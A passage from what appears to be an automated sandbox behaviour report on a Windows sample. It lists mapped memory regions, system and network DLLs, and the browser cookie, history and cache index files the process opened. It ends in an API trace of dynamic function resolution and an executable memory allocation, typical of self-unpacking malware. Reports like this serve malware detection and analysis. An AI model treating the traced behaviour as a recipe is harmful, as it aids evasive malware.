"private_0x0000000001db0000" filename = "" Region: id = 1691 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1692 start_va = 0x1980000 end_va = 0x1996fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1693 start_va = 0x74e70000 end_va = 0x74e85fff entry_point = 0x74e72dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1694 start_va = 0x1cb0000 end_va = 0x1cebfff entry_point = 0x1cb128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1695 start_va = 0x1cb0000 end_va = 0x1cebfff entry_point = 0x1cb128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1696 start_va = 0x1cb0000 end_va = 0x1cebfff entry_point = 0x1cb128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1697 start_va = 0x1cb0000 end_va = 0x1cebfff entry_point = 0x1cb128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1698 start_va = 0x1cb0000 end_va = 0x1cebfff entry_point = 0x1cb128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1699 start_va = 0x74c20000 end_va = 0x74c5afff entry_point = 0x74c2128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1700 start_va = 0x1980000 end_va = 0x198ffff entry_point = 0x0 region_type = private name = "private_0x0000000001980000" filename = "" Region: id = 1701 start_va = 0x1990000 end_va = 0x1997fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001990000" filename = "" Region: id = 1702 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1703 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1704 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1705 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1706 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1707 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1708 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1709 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1710 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1711 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1712 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1713 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1714 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1715 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1716 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1717 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1718 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1719 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1720 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1721 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1722 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1723 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1724 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1725 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1726 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1727 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1728 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1729 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1730 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1731 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1732 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1733 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1734 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1735 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1736 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1737 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1738 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1739 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1740 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1741 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1742 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1743 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1744 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1745 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1746 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1747 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1748 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1749 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1750 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1751 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1752 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1753 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1754 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1755 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1756 start_va = 0x1980000 end_va = 0x1987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1757 start_va = 0x1980000 end_va = 0x1981fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1758 start_va = 0x1990000 end_va = 0x199ffff entry_point = 0x1990000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1759 start_va = 0x1ba0000 end_va = 0x1ba7fff entry_point = 0x1ba0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1760 start_va = 0x1bb0000 end_va = 0x1bbffff entry_point = 0x1bb0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1761 start_va = 0x74800000 end_va = 0x74820fff entry_point = 0x7480145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1762 start_va = 0x77420000 end_va = 0x77464fff entry_point = 0x774211e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1763 start_va = 0x76960000 end_va = 0x76994fff entry_point = 0x7696145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1764 start_va = 0x773e0000 end_va = 0x773e5fff entry_point = 0x773e1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1765 start_va = 0x1eb0000 end_va = 0x200ffff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 1766 start_va = 0x74d00000 end_va = 0x74d43fff entry_point = 0x74d163f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1767 start_va = 0x2010000 end_va = 0x214ffff entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 1768 start_va = 0x740f0000 end_va = 0x7410bfff entry_point = 0x740fa431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1769 start_va = 0x740e0000 end_va = 0x740e6fff entry_point = 0x740e128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1770 start_va = 0x75890000 end_va = 0x75892fff entry_point = 0x75890000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 1771 start_va = 0x72c00000 end_va = 0x72c51fff entry_point = 0x72c014be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1772 start_va = 0x72be0000 end_va = 0x72bf4fff entry_point = 0x72be12de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1773 start_va = 0x733b0000 end_va = 0x733bcfff entry_point = 0x733b1326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1774 start_va = 0x1bc0000 end_va = 0x1bc0fff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 1775 start_va = 0x1bc0000 end_va = 0x1bc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bc0000" filename = "" Region: id = 1776 start_va = 0x72040000 end_va = 0x72045fff entry_point = 0x7204125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 1777 start_va = 0x747f0000 end_va = 0x747fffff entry_point = 0x747f38c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1778 start_va = 0x1cb0000 end_va = 0x1d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 1779 start_va = 0x1cb0000 end_va = 0x1ceffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 1780 start_va = 0x1d20000 end_va = 0x1d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 1781 start_va = 0x1cb0000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 1782 start_va = 0x1ce0000 end_va = 0x1ceffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 1783 start_va = 0x21d0000 end_va = 0x22cffff entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 1784 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1785 start_va = 0x2330000 end_va = 0x242ffff entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 1786 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1787 start_va = 0x6f800000 end_va = 0x6f805fff entry_point = 0x6f8014b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1788 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cb0000" filename = "" Region: id = 1789 start_va = 0x1eb0000 end_va = 0x1faffff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 1790 start_va = 0x1fd0000 end_va = 0x200ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 1791 start_va = 0x24e0000 end_va = 0x25dffff entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 1792 start_va = 0x766f0000 end_va = 0x76772fff entry_point = 0x766f23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1793 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1794 start_va = 0x1cc0000 end_va = 0x1cc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cc0000" filename = "" Region: id = 1795 start_va = 0x6f880000 end_va = 0x6f8d9fff entry_point = 0x6f881f35 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1796 start_va = 0x753e0000 end_va = 0x753edfff entry_point = 0x753e1235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1797 start_va = 0x27b0000 end_va = 0x28affff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 1798 start_va = 0x6e660000 end_va = 0x6e667fff entry_point = 0x6e662ca6 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1799 start_va = 0x735d0000 end_va = 0x735dffff entry_point = 0x735d1526 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1800 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1801 start_va = 0x735b0000 end_va = 0x735c1fff entry_point = 0x735b18f2 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1802 start_va = 0x74e30000 end_va = 0x74e6bfff entry_point = 0x74e3145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1803 start_va = 0x735a0000 end_va = 0x735a7fff entry_point = 0x735a131e region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1804 start_va = 0x749d0000 end_va = 0x749d4fff entry_point = 0x749d15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1805 start_va = 0x75270000 end_va = 0x75275fff entry_point = 0x75271673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1806 start_va = 0x73fa0000 end_va = 0x73fd7fff entry_point = 0x73fa990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1807 start_va = 0x1cf0000 end_va = 0x1d15fff entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 1808 start_va = 0x2010000 end_va = 0x210ffff entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 1809 start_va = 0x2110000 end_va = 0x214ffff entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 1810 start_va = 0x2430000 end_va = 0x24d5fff entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 1811 start_va = 0x2730000 end_va = 0x276ffff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 1812 start_va = 0x29a0000 end_va = 0x2a9ffff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 1813 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1814 start_va = 0x1d30000 end_va = 0x1d92fff entry_point = 0x0 region_type = private name = "private_0x0000000001d30000" filename = "" Region: id = 1815 start_va = 0x2620000 end_va = 0x271ffff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 1816 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1817 start_va = 0x1fb0000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 1818 start_va = 0x2b00000 end_va = 0x2bfffff entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 1819 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1820 start_va = 0x1cd0000 end_va = 0x1cd6fff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 1821 start_va = 0x2ce0000 end_va = 0x2ddffff entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 1822 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 1823 start_va = 0x2ea0000 end_va = 0x2f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1824 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 1825 start_va = 0x71dd0000 end_va = 0x71de1fff entry_point = 0x71dd1200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1826 start_va = 0x73e90000 end_va = 0x73ea0fff entry_point = 0x73e90000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1827 start_va = 0x73e80000 end_va = 0x73e88fff entry_point = 0x73e815a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1828 start_va = 0x75290000 end_va = 0x752a8fff entry_point = 0x75291319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1829 start_va = 0x73e70000 end_va = 0x73e7efff entry_point = 0x73e70000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1830 start_va = 0x734e0000 end_va = 0x734eefff entry_point = 0x734e0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1831 start_va = 0x2150000 end_va = 0x216bfff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 1842 start_va = 0x2170000 end_va = 0x2188fff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 1882 start_va = 0x22d0000 end_va = 0x232afff entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 1883 start_va = 0x3020000 end_va = 0x311ffff entry_point = 0x0 region_type = private name = "private_0x0000000003020000" filename = "" Region: id = 1884 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 1903 start_va = 0x3220000 end_va = 0x331ffff entry_point = 0x0 region_type = private name = "private_0x0000000003220000" filename = "" Region: id = 1904 start_va = 0x72050000 end_va = 0x72057fff entry_point = 0x72050000 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 1905 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 1915 start_va = 0x753b0000 end_va = 0x753d8fff entry_point = 0x753b6b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1956 start_va = 0x3330000 end_va = 0x342ffff entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 1957 start_va = 0x71fd0000 end_va = 0x71fe3fff entry_point = 0x71fd0000 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 1958 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 1972 start_va = 0x6f500000 end_va = 0x6f516fff entry_point = 0x6f500000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 1973 start_va = 0x6f4f0000 end_va = 0x6f4f7fff entry_point = 0x6f4f0000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 1983 start_va = 0x70170000 end_va = 0x7017afff entry_point = 0x70171200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1984 start_va = 0x6f4e0000 end_va = 0x6f4ecfff entry_point = 0x6f4e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Thread: id = 74 os_tid = 0xc1c [0076.129] GetConsoleCP () returned 0x0 [0076.129] GetMUILanguage () returned 0x0 [0076.129] ConvertFiberToThread () returned 0 [0076.129] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76890000 [0076.131] GetProcAddress (hModule=0x76890000, lpProcName="ReleaseCapture") returned 0x768c69f2 [0076.131] ReleaseCapture () returned 1 [0076.131] GetProcAddress (hModule=0x76890000, lpProcName="GetProcessWindowStation") returned 0x7689dfdc [0076.131] GetProcessWindowStation () returned 0x30 [0076.131] SHGetFileInfoA (in: pszPath="", dwFileAttributes=0x0, psfi=0x2cf628, cbFileInfo=0x160, uFlags=0x4200 | out: psfi=0x2cf628) returned 0x4897a0 [0076.220] GetProcAddress (hModule=0x76890000, lpProcName="GetCaretBlinkTime") returned 0x768a0d01 [0076.220] GetCaretBlinkTime () returned 0x212 [0076.220] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x2cf31c | out: ProcedureAddress=0x2cf31c*=0x765e2fb6) returned 0x0 [0076.220] VirtualAlloc (lpAddress=0x0, dwSize=0x12000, flAllocationType=0x1000, flProtect=0x4) returned 0x1960000 [0076.223] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x2cf33c | out: ProcedureAddress=0x2cf33c*=0x765e2fb6) returned 0x0 [0076.223] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x40) returned 0x410000 [0076.224] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x2cf41c | out: ProcedureAddress=0x2cf41c*=0x765e395c) returned 0x0 [0076.224] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x2cf41c | out: ProcedureAddress=0x2cf41c*=0x765e33d3) returned 0x0 [0076.224] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x2cf41c | out: ProcedureAddress=0x2cf41c*=0x765e2fb6) returned 0x0 [0076.224] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x2cf41c | out: ProcedureAddress=0x2cf41c*=0x765d2341) returned 0x0 [0076.224] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="UnmapViewOfFile", Ordinal=0x0, ProcedureAddress=0x2cf41c | out: ProcedureAddress=0x2cf41c*=0x765ddb13) returned 0x0 [0076.224] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="AddVectoredExceptionHandler", 